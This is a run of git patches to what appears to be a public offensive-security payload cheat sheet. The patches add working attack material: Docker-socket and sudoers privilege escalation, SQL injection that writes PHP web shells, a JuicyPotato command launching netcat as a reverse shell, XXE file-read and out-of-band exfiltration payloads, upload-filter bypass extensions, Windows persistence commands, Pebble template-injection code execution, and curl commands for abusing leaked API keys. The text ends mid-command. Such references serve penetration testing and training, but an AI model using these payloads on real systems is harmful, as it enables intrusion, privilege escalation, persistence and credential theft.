+574,13 @@ sh-5.0# id uid=0(root) gid=0(root) groups=0(root) ``` +More docker privilege escalation using the Docker Socket. + +```powershell +sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + ### LXC/LXD The privesc requires to run a container with elevated privileges and mount the host filesystem inside. diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index b7be9050..2aa39306 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -250,7 +250,20 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) ```sql (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# + (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# + +-- SecurityIdiots +make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) + +-- Profexer +(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) + +-- Dr.Z3r0 +(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)) + +-- M@dBl00d +(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) ``` ## MYSQL Current queries From 2b1900e046daa89d2ac31e108f001df80e0ccc43 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 2 Sep 2019 12:36:40 +0200 Subject: [PATCH 050/222] PrivEsc - sudoers + Upload PHP --- GraphQL Injection/README.md | 3 ++- JSON Web Token/README.md | 2 +- .../Linux - Privilege Escalation.md | 6 +++--- .../Extension PHP/extensions.lst | 20 +++++++++++++++++++ Upload Insecure Files/README.md | 11 +++++++++- 5 files changed, 36 insertions(+), 6 deletions(-) create mode 100644 Upload Insecure Files/Extension PHP/extensions.lst diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index caaf7087..b684bc60 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) -* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) \ No newline at end of file +* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) +* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) \ No newline at end of file diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 9d83b6be..ccdb745b 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -250,7 +250,7 @@ Secret is "Sn1f" ### Hashcat -> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065) +> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065) ```bash /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e9d0aabc..53f5588f 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -84,7 +84,7 @@ * Checks if password hashes are stored in /etc/passwd * Extract full details for 'default' uid's such as 0, 1000, 1001 etc * Attempt to read restricted files i.e. /etc/shadow - * List current users history files (i.e .bash_history, .nano_history etc.) + * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) * Basic SSH checks * Privileged access: * Which users have recently used sudo @@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers # use SUDO without password echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers ``` - ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it @@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) -The following exploits are known to work well. +The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`. ### CVE-2016-5195 (DirtyCow) diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst new file mode 100644 index 00000000..b3481610 --- /dev/null +++ b/Upload Insecure Files/Extension PHP/extensions.lst @@ -0,0 +1,20 @@ +.jpeg.php +.jpg.php +.png.php +.php +.php3 +.php4 +.php5 +.php7 +.pht +.phar +.phpt +.pgif +.phtml +.phtm +.php%00.gif +.php\x00.gif +.php%00.png +.php\x00.png +.php%00.jpg +.php\x00.jpg \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e0e7bb0a..82347ce6 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm ### Upload tricks -- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` +- Null byte (works well against `pathinfo()`) + * .php%00.gif + * .php\x00.gif + * .php%00.png + * .php\x00.png + * .php%00.jpg + * .php\x00.jpg - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` + * `Content-Type : image/gif` + * `Content-Type : image/png` + * `Content-Type : image/jpeg` ### Picture upload with LFI From 5455c30ec7ef7aa4a4e17959709469941ada8379 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 8 Sep 2019 19:44:51 +0200 Subject: [PATCH 051/222] Juicy Potato + XXE update --- .../Active Directory Attack.md | 4 +- .../Windows - Privilege Escalation.md | 11 ++- SQL Injection/MySQL Injection.md | 16 +++- Server Side Request Forgery/README.md | 3 +- XXE Injection/README.md | 74 ++++++++++++++----- 5 files changed, 82 insertions(+), 26 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0ee74089..f48597e4 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -9,8 +9,8 @@ * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit) * [Password in AD User comment](#password-in-ad-user-comment) - * [Pass-the-Ticket Golden Tickets](#passtheticket-golden-tickets) - * [Pass-the-Ticket Silver Tickets](#passtheticket-silver-tickets) + * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) + * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 84d92b64..8205602a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -721,9 +721,14 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases 3. Execute JuicyPotato to run a privileged command. ```powershell - juicypotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} - juicypotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} - # -l : local listener port + JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} + JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} + JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" + Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 + ...... + [+] authresult 0 + {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM + [+] CreateProcessWithTokenW OK ``` ## EoP - Common Vulnerabilities and Exposure diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 2aa39306..6574bb05 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -24,6 +24,8 @@ * [MYSQL Current queries](#mysql-current-queries) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) * [MYSQL Write a shell](#mysql-write-a-shell) + * [Into outfile method](#into-outfile-method) + * [Into dumpfile method](#into-dumpfile-method) * [MYSQL UDF command execution](#mysql-udf-command-execution) * [MYSQL Truncation](#mysql-truncation) * [MYSQL Out of band](#mysql-out-of-band) @@ -293,14 +295,22 @@ GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;# ## MYSQL Write a shell +### Into outfile method + ```sql -SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" -SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY ' --1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' +[...] UNION SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php" +[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '' [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- - [...] union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' ``` +### Into dumpfile method + +```sql +[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php' +[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php'; +``` + ## MYSQL Truncation In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed. diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 1f0368a3..03183561 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -644,4 +644,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) -- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) \ No newline at end of file +- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) +- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) \ No newline at end of file diff --git a/XXE Injection/README.md b/XXE Injection/README.md index f3a3fafe..b69754cc 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -12,11 +12,16 @@ Syntax: `` - [Tools](#tools) - [Detect the vulnerability](#detect-the-vulnerability) -- [Read file content](#read-file-content) -- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) -- [XXE to SSRF](#xxe-to-ssrf) -- [Deny of service](#deny-of-service) -- [Blind XXE - Out of Band](#blind-xxe---out-of-Band) +- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files) + - [Classic XXE](#classic-xxe) + - [Classic XXE Base64 encoded](#classic-xxe-base64-encoded) + - [PHP Wrapper inside XXE](#php-wrapper-inside-xxe) + - [XInclude attacks](#xinclude-attacks) +- [Exploiting XXE to perform SSRF attacks](#exploiting-xxe-to-perform-SSRF-attacks) +- [Exploiting XXE to perform a deny of service](#exploiting-xxe-to-perform-a-deny-of-service) + - [Billion Laugh Attack](#billion-laugh-attack) +- [Error Based XXE](#error-based-xxe) +- [Exploiting blind XXE to exfiltrate data out-of-band](#exploiting-blind-xxe-to-exfiltrate-data-out-of-band) - [Blind XXE](#blind-xxe) - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) @@ -53,9 +58,11 @@ Basic entity test, when the XML parser parses the external entities the result s It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server. -## Read file content +## Exploiting XXE to retrieve files -Classic XXE, we try to display the content of the file `/etc/passwd` +### Classic XXE + +We try to display the content of the file `/etc/passwd` ```xml ]>&test; @@ -93,14 +100,13 @@ Classic XXE, we try to display the content of the file `/etc/passwd` ]>&xxe; ``` - -Classic XXE Base64 encoded +### Classic XXE Base64 encoded ```xml %init; ]> ``` -## PHP Wrapper inside XXE +### PHP Wrapper inside XXE ```xml ]> @@ -124,7 +130,16 @@ Classic XXE Base64 encoded &xxe; ``` -## XXE to SSRF +### XInclude attacks + +When you can't modify the **DOCTYPE** element use the **XInclude** to target + +```xml + + +``` + +## Exploiting XXE to perform SSRF attacks XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) to target another service on the network. @@ -132,17 +147,17 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo - + ]> &xxe; ``` -## Deny of service +## Exploiting XXE to perform a deny of service :warning: : These attacks might kill the service or the server, do not use them on the production. -Billion Laugh Attack +### Billion Laugh Attack ```xml &a4; ``` -Yaml attack +### Yaml attack ```xml a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] @@ -169,7 +184,30 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -## Blind XXE - Out of Band + +## Error Based XXE + +**Payload to trigger the XXE** + +```xml + + + %ext; +]> + +``` + +**Contents of ext.dtd** +```xml + +"> +%eval; +%error; +``` + + +## Exploiting blind XXE to exfiltrate data out-of-band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. @@ -301,7 +339,7 @@ GIF (experimental) * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) -* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) +* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 - Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) * [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) * [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html) * [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/) @@ -312,3 +350,5 @@ GIF (experimental) * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) +* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) +* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) \ No newline at end of file From 742e3204d3ddc2a521555acff02d8b6f3d9aeb52 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 13 Sep 2019 17:38:23 +0200 Subject: [PATCH 052/222] SharpPersist - Windows Persistence --- JSON Web Token/README.md | 21 +++++++++- .../Windows - Persistence.md | 41 ++++++++++++++++++- 2 files changed, 60 insertions(+), 2 deletions(-) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index ccdb745b..a6fb0808 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). } ``` +| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements | +|---|---|---| +| HS256 | HMAC using SHA-256 | Required | +| HS384 | HMAC using SHA-384 | Optional | +| HS512 | HMAC using SHA-512 | Optional | +| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended | +| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional | +| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional | +| ES256 | ECDSA using P-256 and SHA-256 | Recommended | +| ES384 | ECDSA using P-384 and SHA-384 | Optional | +| ES512 | ECDSA using P-521 and SHA-512 | Optional | +| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional | +| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional | +| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional | +| none | No digital signature or MAC performed | Required | + + + ### Payload ```json @@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret - [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/) - [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9) - [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) -- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) \ No newline at end of file +- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/) +- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d8fa2cd3..d005bd8a 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -2,6 +2,7 @@ ## Summary +* [Tools](#tools) * [Userland](#userland) * [Registry](#registry) * [Startup](#startup) @@ -13,6 +14,10 @@ * [References](#references) +## Tools + +- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist) + ## Userland ### Registry @@ -24,6 +29,14 @@ Value name: Backdoor Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env +SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add +``` + ### Startup Create a batch script in the user startup folder. @@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe ``` +Using SharPersist + +```powershell +SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add +``` + ### Scheduled Task ```powershell @@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +Using SharPersist + +```powershell +# Add to a current scheduled task +SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add + +# Add new task +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add +SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly +``` + +## Windows Service + +Using SharPersist + +```powershell +SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add +``` + ## Elevated ### HKLM @@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) -* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file +* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) +* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) \ No newline at end of file From e6f94af721cee62c445ed29780e28a9f38063011 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 13 Sep 2019 17:49:47 +0200 Subject: [PATCH 053/222] Update FUNDING.yml with buymeacoffee --- .github/FUNDING.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index 3c966688..8b5d40b6 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -2,3 +2,4 @@ github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] ko_fi: swissky # Replace with a single Ko-fi username +custom: https://www.buymeacoffee.com/swissky From a0917241ad687f6f9ec410295b7aefd9f4af5960 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 17 Sep 2019 15:43:13 +0200 Subject: [PATCH 054/222] Pebble - Server Side Template Injection --- Server Side Template Injection/README.md | 30 ++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 8de55ae5..1ac3ac95 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -22,6 +22,9 @@ * [Freemarker](#freemarker) * [Basic injection](#basic-injection) * [Code execution](#code-execution) +* [Peeble](#peeble) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Jade / Codepen](#jade---codepen) * [Velocity](#velocity) * [Mako](#mako) @@ -37,6 +40,7 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [References](#references) ## Tools @@ -153,6 +157,31 @@ The template can be `${3*3}` or the legacy `#{3*3}` ${"freemarker.template.utility.Execute"?new()("id")} ``` +## Pebble + +### Basic injection + +```java +{{ someString.toUPPERCASE() }} +``` + +### Code execution + +```java +{% set cmd = 'id' %} +{% set bytes = (1).TYPE + .forName('java.lang.Runtime') + .methods[6] + .invoke(null,null) + .exec(cmd) + .inputStream + .readAllBytes() %} +{{ (1).TYPE + .forName('java.lang.String') + .constructors[0] + .newInstance(([bytes]).toArray()) }} +``` + ## Jade / Codepen ```python @@ -355,3 +384,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) +* [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) \ No newline at end of file From 8822199f654c2b89ca71e682a9d380ba4eacb51f Mon Sep 17 00:00:00 2001 From: Techbrunch Date: Tue, 17 Sep 2019 16:23:14 +0200 Subject: [PATCH 055/222] Add XXE payload inside SVG Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload --- XXE Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b69754cc..378c8c29 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -298,6 +298,14 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788) ``` +``` + + ]> + + &xxe; + +``` + ### XXE inside SOAP ```xml @@ -351,4 +359,4 @@ GIF (experimental) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) * [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) -* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) \ No newline at end of file +* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) From 9a02958b511bd4f6e9f0c6a07edb81b805c9c7d3 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 22 Sep 2019 17:06:44 +0200 Subject: [PATCH 056/222] API Key Leaks - Twitter/Twilio/Gitlab --- API Key Leaks/README.md | 93 +++++++++++++++++++++++++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 API Key Leaks/README.md diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md new file mode 100644 index 00000000..5814842c --- /dev/null +++ b/API Key Leaks/README.md @@ -0,0 +1,93 @@ +# API Key Leaks + +> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares. + +## Summary + +- [Tools](#tools) +- [Exploit](#exploit) + - [Algolia](#algolia) + - [AWS Access Key ID & Secret](#aws-access-key-id-secret) + - [Slack API Token](#slack-api-token) + - [Facebook Access Token](#facebook-access-token) + - [Github client id and client secret](#github-client-id-and-client-secret) + - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token) + - [Twitter API Secret](#twitter-api-secret) + - [Twitter Bearer Token](#twitter-bearer-token) + - [Gitlab Personal Access Token](#gitlab-personnal-access-token) + +## Tools + +- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) +- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) + +## Exploit + +The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token. + +### Algolia + +```powershell +curl --request PUT \ + --url https://-1.algolianet.com/1/indexes//settings \ + --header 'content-type: application/json' \ + --header 'x-algolia-api-key: ' \ + --header 'x-algolia-application-id: ' \ + --data '{"highlightPreTag": ""}' +``` + +### AWS Access Key ID & Secret + +```powershell +git clone https://github.com/andresriancho/enumerate-iam +cd enumerate-iam +./enumerate-iam.py --access-key AKIA... --secret-key XXX.. +``` + +### Slack API Token + +```powershell +curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1" +``` + +### Facebook Access Token + +```powershell +curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2 +``` + +### Github client id and client secret + +```powershell +curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy' +``` + +### Twilio Account_sid and Auth token + +```powershell +curl -X GET 